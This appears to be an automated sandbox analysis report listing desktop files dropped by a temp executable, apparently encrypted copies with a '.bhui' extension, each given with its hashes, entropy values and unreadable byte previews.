SHA-256:	9017B352D71656BA651484D00601CD6364F9273486BD4C57C77C7AF73D0BD941
SHA-512:	8F8CDF17D7E0E79CBF2EFCCD8A161018A2607C4CE3A1F92A8A341F7C7317B3E9683BF0B2B550C6E6D918AE3A0CFF58F3410FD1592C5350BBF0D29564EB6F6AAB
Malicious:	false
Reputation:	unknown
Preview:	NYMMP.e.o^...-:......w..91?..\|T\|..;..+...A...#M.h.kx.Z.s.............f....k..s{.D.P..p...!....D.wfZ..2i.7..09 ...J......,..c(XOs....z..&.......r ...i.....jJZ..8l..}".Ge....c...]...9-Hk........'4.........C.......7%$.U.3.8g.}....5..w..>...D~.^!g./j..-.5..5..)....EMm...(d.6..B.........lI.?28..U....n.?.C.$....1.........c...sIn.......W...._.\2~.......U..J....2.....F9.w.%Q..M....)......p.....?V.C..m\|nv.7.8.".....X=...}....Vk..Fu.....!..eFz.....:..../.h.@7..S.X.>.....#.o/_..{.)..4.D..d.^....p.b.H\|.....Y......fJ.;.\|...i......c.L.(.c=a...+..7'....YNSUt.....8.4.~E....)....._.n.}5b...cY.........^.pP..N.....5L.."]W..'.6F.'.w/_.3"..z...D.%.6.+.mf{?.....G......\.cU..E.L..C..W......B........-n@1..+...;..(.n..........,l..E.....l....;..O.......Y.E.....2.....]8..Y.(.qr-..Bz..~%.b..@.9@....f...v..Y.\u.Kg..;+,\|.]bCl...........U...i\|. .8...l.r....o.r.2)...".J:].g.v..mH..)5....]./)\....X..Y#.w.?.8...^..........E?i.F.........z.C.E..}.g..dt.....F..bj.(.

C:\Users\user\Desktop\NYMMPCEIMA\GLTYDMDUST.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.844512124734674
Encrypted:	false
SSDEEP:	24:Sk/n6bFjyNwPkAYVdeLjVKOXzzSDmwYMcJbOUfTnNZYKDMmWSDJSpTybHcVcWeWX:Sk/sFjo9AY+LjVrXfSawYMcBOs7NDLWN
MD5:	3437A2CC989DDD61691D5C5B0ED7AAE9
SHA1:	631754E766EFEB7C064532CBA0D38AFD07A1CF54
SHA-256:	D2FF9DE71E9EF335CAAB7AC5CAD4167AB87EC121D099E3D08D84520012FCCCE3
SHA-512:	CCDA858544E660F151424DE0C43CF0E02E701BAF65085EDC5FF5D6ADA92169B52DB4C64589838D73ACB3BEB8EA8A18E188F3FFAFCE3C2081F6645E88C40AEEF2
Malicious:	false
Reputation:	unknown
Preview:	GLTYDI..hE.......}>.k.s.....n6_.#~.%.. ..=_dzX.X.KD)S.5...A../.k....7\|.6.=.\<.v.Q.7......?O.bi...).M...~t.f.}sp...........)G.+\|.bO...H...O.D..KW....&sF_.....w.Fr.k6.&.sKz..)F...q.&J.h................5g..d..J-..\....5...O...E.Y.....s}...T.#.xB.)..>>#.....[...X...a....Uk.YL.p\.M..F.+.m..a......^...J.Pe.h7.j..QRk...=.5..@...h#....0....]K...a&,...J..W.Sw_.V....P..7a.Z.7...O..).Z.....<...%4._UXW...+..E...t.5,$2...z.UT...3.........x..6w_z..`.X...3..2..F.$.....uC...........4-$...Q...x.1.#....6B.%%o...4h.v..".M.U..G.&.%.....l..(.q....\zA...L..A)Z.t..8n...(.g.....%D..Z...D5.tZ.]3...d...b.G.k.Hw.e.^....<....o...U...o.j?I...#s.}..2w....,EeD&...\o...iq..E.4T......E.....e...":n..S.J..f.a1..0.@.e..3.g...8...lk7\|0.g.m.P....$.mb.X.7wC.'^H..@r...x..-.....V{......s.xN..i..a^NZ1....Q.*}.L...s.wtAH.\.]h....B.+U...)J>.T.O..Z..iE..TL...F.`m_....!.../I.c..>......CQ....a.[;.U/...0.........L.(.....T.....+.gU..egi...p......1?3`....i....Ru..uul..BV..(D...P7..$A^.......

C:\Users\user\Desktop\NYMMPCEIMA\GLTYDMDUST.pdf.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.844512124734674
Encrypted:	false
SSDEEP:	24:Sk/n6bFjyNwPkAYVdeLjVKOXzzSDmwYMcJbOUfTnNZYKDMmWSDJSpTybHcVcWeWX:Sk/sFjo9AY+LjVrXfSawYMcBOs7NDLWN
MD5:	3437A2CC989DDD61691D5C5B0ED7AAE9
SHA1:	631754E766EFEB7C064532CBA0D38AFD07A1CF54
SHA-256:	D2FF9DE71E9EF335CAAB7AC5CAD4167AB87EC121D099E3D08D84520012FCCCE3
SHA-512:	CCDA858544E660F151424DE0C43CF0E02E701BAF65085EDC5FF5D6ADA92169B52DB4C64589838D73ACB3BEB8EA8A18E188F3FFAFCE3C2081F6645E88C40AEEF2
Malicious:	false
Reputation:	unknown
Preview:	GLTYDI..hE.......}>.k.s.....n6_.#~.%.. ..=_dzX.X.KD)S.5...A../.k....7\|.6.=.\<.v.Q.7......?O.bi...).M...~t.f.}sp...........)G.+\|.bO...H...O.D..KW....&sF_.....w.Fr.k6.&.sKz..)F...q.&J.h................5g..d..J-..\....5...O...E.Y.....s}...T.#.xB.)..>>#.....[...X...a....Uk.YL.p\.M..F.+.m..a......^...J.Pe.h7.j..QRk...=.5..@...h#....0....]K...a&,...J..W.Sw_.V....P..7a.Z.7...O..).Z.....<...%4._UXW...+..E...t.5,$2...z.UT...3.........x..6w_z..`.X...3..2..F.$.....uC...........4-$...Q...x.1.#....6B.%%o...4h.v..".M.U..G.&.%.....l..(.q....\zA...L..A)Z.t..8n...(.g.....%D..Z...D5.tZ.]3...d...b.G.k.Hw.e.^....<....o...U...o.j?I...#s.}..2w....,EeD&...\o...iq..E.4T......E.....e...":n..S.J..f.a1..0.@.e..3.g...8...lk7\|0.g.m.P....$.mb.X.7wC.'^H..@r...x..-.....V{......s.xN..i..a^NZ1....Q.*}.L...s.wtAH.\.]h....B.+U...)J>.T.O..Z..iE..TL...F.`m_....!.../I.c..>......CQ....a.[;.U/...0.........L.(.....T.....+.gU..egi...p......1?3`....i....Ru..uul..BV..(D...P7..$A^.......

C:\Users\user\Desktop\NYMMPCEIMA\HMPPSXQPQV.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8438537256708365
Encrypted:	false
SSDEEP:	24:si+V+rZSYn5JS8OV+PiIcA/tRjL7tfXxu4jamAXNw1vUHW2Xq8UJQ37g7MfyP1gl:si+VBc5HOIztRVMeIN02q8Z375fQ1aD
MD5:	F4AD4E8D1B6421462D469799BAB67C04
SHA1:	ED9A1E25B952B0F1921F513DB0A48B0FA58344F5
SHA-256:	47009C7F435DFADE0057BFDA327F8B0EBC5E21FB59E8AF6272BC5A0BD0CEA113
SHA-512:	E729516A9587C33C44F825139EB902C5B7DEC6C6F82CEAF7BEC51C250F530D79010ACD83F85537E2918DED6CB3562F63F7A36AAC325BB2356EA19EB6C9E84CAA
Malicious:	false
Reputation:	unknown
Preview:	HMPPSP..Y5.3.O.=D.gA..x.!..6.."......%KmlVS....;.......N<.lY...I...7....g...XN7#...U.."_-......l^/....{....sU.F&..j.m....bt.0.B=9...a.y...>`.........6....#.eH-R..A...<.....q./.(..5L^<{...\K...4.TZ.<.........ZW....).....T.]lO....\Om{-....4..7+.7k.dQ...x....'S..`.W..n.H..O.T.N...c..(..a.....q.5..&.J.~..g..#..e:....O.....oqp-gF....k..&F._....M`...x.+...=S...N..Gp.m.$....r&.....)...d.n..9.u._...6.A...e.^l.L.......E=M...H..I+5.2D.D^.<.....lj.......>...G..6u.i~..5.........\w-.1.U.u....z...tu..XG\.d..~O4..N...RE.XOG._.....{..C...jR9y......@.u@.........W.j8..]RR.$.Xa...ba.}Fo2i.J.@..w...._.K......t.....)...Dp..'.K....3....:j..$..;.A.):..p."..M7k;.J.Mak.^.s._.Hw.@...........K.9t..rJ..B!.....A...I.M....._.{........?84Pu....xT...=........^l._.O....#.....+.....6.sf#.("..F...li"$.Y...u.rd..$$x..!...?.....O.+.@Y..8....l..53...4x...j."....5j........0...(`..#..-.....H........F.....q......t....R...l...#h....(2...Qv&......r.a...R-...$..\|..,..H..

C:\Users\user\Desktop\NYMMPCEIMA\HMPPSXQPQV.png.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8438537256708365
Encrypted:	false
SSDEEP:	24:si+V+rZSYn5JS8OV+PiIcA/tRjL7tfXxu4jamAXNw1vUHW2Xq8UJQ37g7MfyP1gl:si+VBc5HOIztRVMeIN02q8Z375fQ1aD
MD5:	F4AD4E8D1B6421462D469799BAB67C04
SHA1:	ED9A1E25B952B0F1921F513DB0A48B0FA58344F5
SHA-256:	47009C7F435DFADE0057BFDA327F8B0EBC5E21FB59E8AF6272BC5A0BD0CEA113
SHA-512:	E729516A9587C33C44F825139EB902C5B7DEC6C6F82CEAF7BEC51C250F530D79010ACD83F85537E2918DED6CB3562F63F7A36AAC325BB2356EA19EB6C9E84CAA
Malicious:	false
Reputation:	unknown
Preview:	HMPPSP..Y5.3.O.=D.gA..x.!..6.."......%KmlVS....;.......N<.lY...I...7....g...XN7#...U.."_-......l^/....{....sU.F&..j.m....bt.0.B=9...a.y...>`.........6....#.eH-R..A...<.....q./.(..5L^<{...\K...4.TZ.<.........ZW....).....T.]lO....\Om{-....4..7+.7k.dQ...x....'S..`.W..n.H..O.T.N...c..(..a.....q.5..&.J.~..g..#..e:....O.....oqp-gF....k..&F._....M`...x.+...=S...N..Gp.m.$....r&.....)...d.n..9.u._...6.A...e.^l.L.......E=M...H..I+5.2D.D^.<.....lj.......>...G..6u.i~..5.........\w-.1.U.u....z...tu..XG\.d..~O4..N...RE.XOG._.....{..C...jR9y......@.u@.........W.j8..]RR.$.Xa...ba.}Fo2i.J.@..w...._.K......t.....)...Dp..'.K....3....:j..$..;.A.):..p."..M7k;.J.Mak.^.s._.Hw.@...........K.9t..rJ..B!.....A...I.M....._.{........?84Pu....xT...=........^l._.O....#.....+.....6.sf#.("..F...li"$.Y...u.rd..$$x..!...?.....O.+.@Y..8....l..53...4x...j."....5j........0...(`..#..-.....H........F.....q......t....R...l...#h....(2...Qv&......r.a...R-...$..\|..,..H..

C:\Users\user\Desktop\NYMMPCEIMA\LFOPODGVOH.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.859459877641265
Encrypted:	false
SSDEEP:	24:E0OkkFrqf8oYUgL388Q5fH0bRfP08vke/yKsPcpZrSrIstygOFJcO5WbD:ElkyGf8fUk88kfetsIhoOZXQygOFKD
MD5:	A2F690D07D1D89B793BD76B76FBF1347
SHA1:	214BBEE253D9B690BB3A354D8158CB05C1756D72
SHA-256:	FE9FDB7094E127CFFFC4086B771EC6E9A0EA962DE2CAB270A723221609A40202
SHA-512:	02AF5E874057A89ACB78D7C24E0E4FE054A42CAD7E788D83A034C897CF4003AEF4CEC8D7F0CED724A3907A85C1FCB3C8BF2E5EA033278AB1D6CC90C4DD90A28E
Malicious:	false
Reputation:	unknown
Preview:	LFOPO.....u.o..^.U.(.....-s......%.%.}..l.Zv.Yy.:}.....Y..?&1s.....}.....+H..9..v..........n.YJ[x...K..n .l.B.."?....h..U..k.....0h..9.^.=...H..W...!..\|s.A.......$kY....m...koR.u......S.8..vg....m...}.v.m.=.x@....ZQA...0..g..........4-.....v..UT^.z..y.q...H...4K....U>J.?..b{v'}W...Q..Y$.E.:..c%.fi ..,.sue.t.\|...,..{...#.cZ.gX..p..]5.5..-/P6......&..}r....N..ugkXI...Qlm........a.;..k.t6.]..O.&/.X(....5.'...&.........f. ..4~...=.....L;.Y...G.N..%.F.D_.......I/.TX.;bk....,.J..........x%xS.P.F..N.x,..Q........N.S.D.....C.u....Cv....$G..Y...Ox..V..3N1..I....f.}.$ ....9$T}./5z.@K.S7.~.....C.s..O..!s..?g.d.Df..$.).......C.$y."<.......T7...s9.fI.qEm........(G...j....@>...\....r..#.d...n.\|..e.........@24..k..5.......x.s.....U.\|J...a.}...:........t..(.t.:..<.............=sN1...O.dS...._.-...../bk$.6.)....j.tZ. ...........Y....'./1ST....:.[ewV9..\|;a."..oh6ZU.+A......^.u.G....!..-..K40.K..d.p..!...L.U\..i.c..}....v.Q2;..{....7.nO.....~w./.h...._.

C:\Users\user\Desktop\NYMMPCEIMA\LFOPODGVOH.jpg.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.859459877641265
Encrypted:	false
SSDEEP:	24:E0OkkFrqf8oYUgL388Q5fH0bRfP08vke/yKsPcpZrSrIstygOFJcO5WbD:ElkyGf8fUk88kfetsIhoOZXQygOFKD
MD5:	A2F690D07D1D89B793BD76B76FBF1347
SHA1:	214BBEE253D9B690BB3A354D8158CB05C1756D72
SHA-256:	FE9FDB7094E127CFFFC4086B771EC6E9A0EA962DE2CAB270A723221609A40202
SHA-512:	02AF5E874057A89ACB78D7C24E0E4FE054A42CAD7E788D83A034C897CF4003AEF4CEC8D7F0CED724A3907A85C1FCB3C8BF2E5EA033278AB1D6CC90C4DD90A28E
Malicious:	false
Reputation:	unknown
Preview:	LFOPO.....u.o..^.U.(.....-s......%.%.}..l.Zv.Yy.:}.....Y..?&1s.....}.....+H..9..v..........n.YJ[x...K..n .l.B.."?....h..U..k.....0h..9.^.=...H..W...!..\|s.A.......$kY....m...koR.u......S.8..vg....m...}.v.m.=.x@....ZQA...0..g..........4-.....v..UT^.z..y.q...H...4K....U>J.?..b{v'}W...Q..Y$.E.:..c%.fi ..,.sue.t.\|...,..{...#.cZ.gX..p..]5.5..-/P6......&..}r....N..ugkXI...Qlm........a.;..k.t6.]..O.&/.X(....5.'...&.........f. ..4~...=.....L;.Y...G.N..%.F.D_.......I/.TX.;bk....,.J..........x%xS.P.F..N.x,..Q........N.S.D.....C.u....Cv....$G..Y...Ox..V..3N1..I....f.}.$ ....9$T}./5z.@K.S7.~.....C.s..O..!s..?g.d.Df..$.).......C.$y."<.......T7...s9.fI.qEm........(G...j....@>...\....r..#.d...n.\|..e.........@24..k..5.......x.s.....U.\|J...a.}...:........t..(.t.:..<.............=sN1...O.dS...._.-...../bk$.6.)....j.tZ. ...........Y....'./1ST....:.[ewV9..\|;a."..oh6ZU.+A......^.u.G....!..-..K40.K..d.p..!...L.U\..i.c..}....v.Q2;..{....7.nO.....~w./.h...._.

C:\Users\user\Desktop\NYMMPCEIMA\NWCXBPIUYI.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846048846181417
Encrypted:	false
SSDEEP:	24:nGz0wwGMJNIaZTda9HTIc4i+aaIhP6QaItr56fTlErtHUWbD:G4wdoNtHkHTP4Sawic1EIJD
MD5:	C1AB40A87AA2B0E677A5FA42B1E282F1
SHA1:	6501599CAC9527344E5EE67063F39462FAAE50AD
SHA-256:	A124E7AB076DB5EB7DBA85073E9F4EBD06A579B467F9DDA8CBA8746F55346AA9
SHA-512:	774BEA8CC1D4D7885D392D9689BEC9B73A7C336424F2062A4387CCEC9584BEE58C524B5D6A84BAA7F7C8A8939FF55DF50DE396B7EED10574367ED2F4B5F07163
Malicious:	false
Reputation:	unknown
Preview:	NWCXB`....l-.+.O....n#j.RM._....)#........iu...a.w...4..8.)..{.a)....6z)..(...A${B..0I.'.6.]>..1..2Y=k;./..%..>In....I..$.....AA...4.d...8....;h...k.{.A.Sk.{6.J'Q.J......U.......~......@..../.e=.C.X(D..a....l...%#.=.;.2.7...d.S...C.....B.o...TRI..{. >.R.N.YX:.K".h:u.>.q...NA.J.YW..j......cjC.0...a..1.I....q.K.i..G.c!...ltn...=.,.O..Xu...@.....6..0n{....w(..h`9.b......B.f@...D..%.n^.....Y..^T.&..........h......I.....\.H.....x.[s.n{MNZ.....\|>.Pk....S..7I...(..p.g.....>Q#dC...P...?.h)RC..!p..m.z.=.pG%=.d..O...;.....&.S).l.uo.O..i...k.A.....P.&..............;%8...:..S...mVE.....XR...\|M{.....h.\|:"E....&.....W..!Sf.U{Y..V.)....h..\|.W=4.w@o.C.v.}.Z.{&...A...f.....@........co...x.w.A[JA.K...y.%..J.2...H.m.!.........../...4.0.m....7ZS.3..._..y%.l..3:<.p.A.....1..8R...`.^.....N...^m.P......a]....:H.u~....x:...........w_I.G.~..@.....>..........{.....l...{b.......#ys0.).9fv<..e\|.41.....w.8..[.W..wus..fk.\|.Q.xD..q..kW........;.r.....h9d*/.5t]...;.R@.Q

C:\Users\user\Desktop\NYMMPCEIMA\NWCXBPIUYI.xlsx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846048846181417
Encrypted:	false
SSDEEP:	24:nGz0wwGMJNIaZTda9HTIc4i+aaIhP6QaItr56fTlErtHUWbD:G4wdoNtHkHTP4Sawic1EIJD
MD5:	C1AB40A87AA2B0E677A5FA42B1E282F1
SHA1:	6501599CAC9527344E5EE67063F39462FAAE50AD
SHA-256:	A124E7AB076DB5EB7DBA85073E9F4EBD06A579B467F9DDA8CBA8746F55346AA9
SHA-512:	774BEA8CC1D4D7885D392D9689BEC9B73A7C336424F2062A4387CCEC9584BEE58C524B5D6A84BAA7F7C8A8939FF55DF50DE396B7EED10574367ED2F4B5F07163
Malicious:	false
Reputation:	unknown
Preview:	NWCXB`....l-.+.O....n#j.RM._....)#........iu...a.w...4..8.)..{.a)....6z)..(...A${B..0I.'.6.]>..1..2Y=k;./..%..>In....I..$.....AA...4.d...8....;h...k.{.A.Sk.{6.J'Q.J......U.......~......@..../.e=.C.X(D..a....l...%#.=.;.2.7...d.S...C.....B.o...TRI..{. >.R.N.YX:.K".h:u.>.q...NA.J.YW..j......cjC.0...a..1.I....q.K.i..G.c!...ltn...=.,.O..Xu...@.....6..0n{....w(..h`9.b......B.f@...D..%.n^.....Y..^T.&..........h......I.....\.H.....x.[s.n{MNZ.....\|>.Pk....S..7I...(..p.g.....>Q#dC...P...?.h)RC..!p..m.z.=.pG%=.d..O...;.....&.S).l.uo.O..i...k.A.....P.&..............;%8...:..S...mVE.....XR...\|M{.....h.\|:"E....&.....W..!Sf.U{Y..V.)....h..\|.W=4.w@o.C.v.}.Z.{&...A...f.....@........co...x.w.A[JA.K...y.%..J.2...H.m.!.........../...4.0.m....7ZS.3..._..y%.l..3:<.p.A.....1..8R...`.^.....N...^m.P......a]....:H.u~....x:...........w_I.G.~..@.....>..........{.....l...{b.......#ys0.).9fv<..e\|.41.....w.8..[.W..wus..fk.\|.Q.xD..q..kW........;.r.....h9d*/.5t]...;.R@.Q

C:\Users\user\Desktop\NYMMPCEIMA\NYMMPCEIMA.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.872683025403113
Encrypted:	false
SSDEEP:	24:EKmodKe62C7g6q3trCnHgRhDDsi7As8oUeUHFadFW7xWbD:HmCGid9DVAs8oU1eFZD
MD5:	87E7B09547A8FD8317AA0E522B0E1D1F
SHA1:	477788A50033DD95EA4BC3B65281401F9C40E28D
SHA-256:	4BC88BA92D62010FE18DFE55094439A0B45B1B43ECF85DD0D67978654E7A5E14
SHA-512:	DD3A49AF8C5ACCB525B4474FAD218FC7FA923090BD01EA81167BFA6BF0F9DA70C984BB9111D8DCC98F7ABD9038C5B91537B36E92CAA36844EE67F0C35D55156C
Malicious:	false
Reputation:	unknown
Preview:	NYMMPZ..a......L.....k.w.qd..1.K....>.K........P@+..6.YDgm_.....<...{.fX2.i.T...M=OZu..ao)s....oS..z.]...L...C......q.:!.J;&],<...bK./.<.H....0ueo...d.K..?....V........Q-..ob..W...:.O2..j-p.........mc.SO[..s.a<b....r..A....\|}\|...B.....O.^.R..R..P......0..12;..g..oo.4./$.(.....j.%gZ.GD........k.$u].+.........4..J..A.eM.c.e.a.>..Y...~.jr.x.X...(cV.#..!"D..oh.c....i...G....Y...(...Z..^W.B\U...a..Z....}......b.t=.....?.2..}.pu..Xd#O..7....g9q+...3..[...3.YE.G....1.....(B...+v.....q...hw,........KJ..y........Z.BI5.}M..........}x....'.(.}.....,X.....+u?.p..e..R.p.^z...U.....!.g.$h...<l.7...@\..D...r....a.[!<Q2.0.8'.=...Sa.#...x..D.......s.e.......gF....e.&v.:r%s.....T.P.....R].h>...4.gH..N..@..S...F.....n0...y.w..6...&v.h...?..E.B... ..H....Z.Rf...r.....1..#...... 1..$H.Hw`a.%...u.tL......z."..w......%...H`..s..Z..Oj....x...j.2}...\..,dC.L-j.O...[.W.S.?..........i.....U9...."w...Q..f..b.t6c.ae@.c.p`...&:...G.\|{...M.A0...._i.6..E..

C:\Users\user\Desktop\NYMMPCEIMA\NYMMPCEIMA.docx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.872683025403113
Encrypted:	false
SSDEEP:	24:EKmodKe62C7g6q3trCnHgRhDDsi7As8oUeUHFadFW7xWbD:HmCGid9DVAs8oU1eFZD
MD5:	87E7B09547A8FD8317AA0E522B0E1D1F
SHA1:	477788A50033DD95EA4BC3B65281401F9C40E28D
SHA-256:	4BC88BA92D62010FE18DFE55094439A0B45B1B43ECF85DD0D67978654E7A5E14
SHA-512:	DD3A49AF8C5ACCB525B4474FAD218FC7FA923090BD01EA81167BFA6BF0F9DA70C984BB9111D8DCC98F7ABD9038C5B91537B36E92CAA36844EE67F0C35D55156C
Malicious:	false
Reputation:	unknown
Preview:	NYMMPZ..a......L.....k.w.qd..1.K....>.K........P@+..6.YDgm_.....<...{.fX2.i.T...M=OZu..ao)s....oS..z.]...L...C......q.:!.J;&],<...bK./.<.H....0ueo...d.K..?....V........Q-..ob..W...:.O2..j-p.........mc.SO[..s.a<b....r..A....\|}\|...B.....O.^.R..R..P......0..12;..g..oo.4./$.(.....j.%gZ.GD........k.$u].+.........4..J..A.eM.c.e.a.>..Y...~.jr.x.X...(cV.#..!"D..oh.c....i...G....Y...(...Z..^W.B\U...a..Z....}......b.t=.....?.2..}.pu..Xd#O..7....g9q+...3..[...3.YE.G....1.....(B...+v.....q...hw,........KJ..y........Z.BI5.}M..........}x....'.(.}.....,X.....+u?.p..e..R.p.^z...U.....!.g.$h...<l.7...@\..D...r....a.[!<Q2.0.8'.=...Sa.#...x..D.......s.e.......gF....e.&v.:r%s.....T.P.....R].h>...4.gH..N..@..S...F.....n0...y.w..6...&v.h...?..E.B... ..H....Z.Rf...r.....1..#...... 1..$H.Hw`a.%...u.tL......z."..w......%...H`..s..Z..Oj....x...j.2}...\..,dC.L-j.O...[.W.S.?..........i.....U9...."w...Q..f..b.t6c.ae@.c.p`...&:...G.\|{...M.A0...._i.6..E..

C:\Users\user\Desktop\NYMMPCEIMA\VWDFPKGDUF.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.815924345504278
Encrypted:	false
SSDEEP:	24:cAPpY/b3fAXMadkrnei+s2RbwZdG0qXSboqQIi5tVlv74Dl2Yk7r4BLmZIPvJPKO:cs8o8sXBRRb1nSbBW5Llv7UUreCCFKWD
MD5:	BF857EAB807035FA3559C0EA012147AE
SHA1:	BE0A50DCA8E4A55A110C8E213AF744C48043B02F
SHA-256:	6E4688FD8015E7ED64927214BCED722BB971D8311CA5A28142F5304444BF482C
SHA-512:	F0F61D72956270289304625B562DBE27534DD7680F112D203193160D9DDF0CE0840916DD67669DC23DD4F6CA6ABF55304C18FF2D7677815BAE0B087DA36DE951
Malicious:	false
Reputation:	unknown
Preview:	VWDFP.=.4e.Ok..!...`...fhY=..-0.F.9.a.F...NF.#(..s3.<..0l..vl...7...*.._`..r].gF.JO."..l(q...09>.Q.r.!.3....$.v.n#........./.CB.p..y..dU..cBm.T.....J\|...ucg1..Qe..L.........nWb......!..B.L,.)..........!......9....U.Y$. ..y.U.R.>I....8..>,....k.st..+....MV.E......]4.c..Vu.`./...0q.O8...;..(..p\..o...~j.9.R...g. l..0h... .V.9...1\|./f_s`...a.....\|. ..O:..uH...=.....Y.m..Iv.Q#.N....4j3 ...a.a.l..%....W..../..w.8..3.qC..F...d..._....c..... _1.>.........@G].).=...(+..C....vK.BXT9..1.C..M.).F...la......5.j...urv.........<}:..u..._C.......J..B...G......I......i...$%..l.:R-V..z..k}...`.F ...c....2.)T.XBK..4m.#f.....F.....J..#....B.M.e....>.....k....Y.c..Bm.'f...c.....Q..k..9...\|.\...f...3.a O.J.t>.M..%e.X}.X.f%..<@...>..OE..r.@...h/..........E...$....E..A....].pJ...Q.GK....67...Te..Fs.W.$/....M....A\...6..A:.......kn6g)....v?Ew...H]..N~.##I.]?......;.7\|K.......f. o..........e".MF2(.y>f'4"...v.'.}..' o&R>...X7z>X....N`....S.......sn>..W.

C:\Users\user\Desktop\NYMMPCEIMA\VWDFPKGDUF.mp3.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.815924345504278
Encrypted:	false
SSDEEP:	24:cAPpY/b3fAXMadkrnei+s2RbwZdG0qXSboqQIi5tVlv74Dl2Yk7r4BLmZIPvJPKO:cs8o8sXBRRb1nSbBW5Llv7UUreCCFKWD
MD5:	BF857EAB807035FA3559C0EA012147AE
SHA1:	BE0A50DCA8E4A55A110C8E213AF744C48043B02F
SHA-256:	6E4688FD8015E7ED64927214BCED722BB971D8311CA5A28142F5304444BF482C
SHA-512:	F0F61D72956270289304625B562DBE27534DD7680F112D203193160D9DDF0CE0840916DD67669DC23DD4F6CA6ABF55304C18FF2D7677815BAE0B087DA36DE951
Malicious:	false
Reputation:	unknown
Preview:	VWDFP.=.4e.Ok..!...`...fhY=..-0.F.9.a.F...NF.#(..s3.<..0l..vl...7...*.._`..r].gF.JO."..l(q...09>.Q.r.!.3....$.v.n#........./.CB.p..y..dU..cBm.T.....J\|...ucg1..Qe..L.........nWb......!..B.L,.)..........!......9....U.Y$. ..y.U.R.>I....8..>,....k.st..+....MV.E......]4.c..Vu.`./...0q.O8...;..(..p\..o...~j.9.R...g. l..0h... .V.9...1\|./f_s`...a.....\|. ..O:..uH...=.....Y.m..Iv.Q#.N....4j3 ...a.a.l..%....W..../..w.8..3.qC..F...d..._....c..... _1.>.........@G].).=...(+..C....vK.BXT9..1.C..M.).F...la......5.j...urv.........<}:..u..._C.......J..B...G......I......i...$%..l.:R-V..z..k}...`.F ...c....2.)T.XBK..4m.#f.....F.....J..#....B.M.e....>.....k....Y.c..Bm.'f...c.....Q..k..9...\|.\...f...3.a O.J.t>.M..%e.X}.X.f%..<@...>..OE..r.@...h/..........E...$....E..A....].pJ...Q.GK....67...Te..Fs.W.$/....M....A\...6..A:.......kn6g)....v?Ew...H]..N~.##I.]?......;.7\|K.......f. o..........e".MF2(.y>f'4"...v.'.}..' o&R>...X7z>X....N`....S.......sn>..W.

C:\Users\user\Desktop\QCOILOQIKC.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.839534945685286
Encrypted:	false
SSDEEP:	24:yOJ5BSAdfJBaIeXjjaOyoOyjUznnBV7kMH7dWssVvn09K4kspD90nFkbuWbD:95BSAdhBaIeX/vAnBV7FbmVlopkFOD
MD5:	D201A96D887811F081F64B62D9C5AF86
SHA1:	1D959867AA8B54F3EFD899AC8E37E6F3CD4444F1
SHA-256:	46A2F85D3732C5FA980572304EF7728C4E769E5D41B7A19D41C34DEBBF4D2C15
SHA-512:	7CDDB4EBD6C7A3D26198631FAA370B9B070ABEE09C43C4781C2DD58D512560AB08EFDD0DB8269162A34D32735CF0F169A06BE124F216259CD42C7C194D4C6E5D
Malicious:	false
Reputation:	unknown
Preview:	QCOIL.Z...............WJ.../.Q.i...'..._^V.8g3U.%..N.../....D.I....[g..../...6K.ienc.......wB..ogVgqI.....o.F.......M.g_^......%JI....y.m...'.X........a..p....U_..D....8y....w.%H....l.1x...if....u.Bl..)...8.%......H.#.F5..-...g....*..5..EYBr..}eJ..[.pQ.0;oS...O;[....G..{&..rC.U@s.....4G<..Jh@..Lb..!..P.m.Xn.#...5d.p.\.[L..G9._.VI.V./..I..u........\|J.k..%....$mbIY'.......a..o..u..P=A...B.B._.%J..\|........x..pn.....M..83.....,.%..:7./....c..$O).O...}...I\....{..HE.k...5.F....GDI..kt...c.K.].3"...~.Y.Fv.....2<.q..'to.>..:..r....lU...y...`d......FO).[.Dh..tI.....Nf._~G.6P....D.\.V.W..Y?1e..e.LK.e..../..u'.o.x/...9C5Sw.P...Mj'n/.5[,.~Z..$......."1..z.e..b.k.i.N...P..NY..g..;n.......F .G..m.M...%(....yq!{.<.o..G.-`mA...d]b..`/4.j.......Oz.q.Yf.q[ 1.K...xY.F..s..H.](.O..d..#...C...`.J.g......u84..Ke..!..W..+..s..5..Cn.....]..(U...:....yC..]......l...4......oV...hC.8....B<}[.e....EVS..z..."..BJ.JB.....g.^7./B;..i.}.......b2...

C:\Users\user\Desktop\QCOILOQIKC.docx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.839534945685286
Encrypted:	false
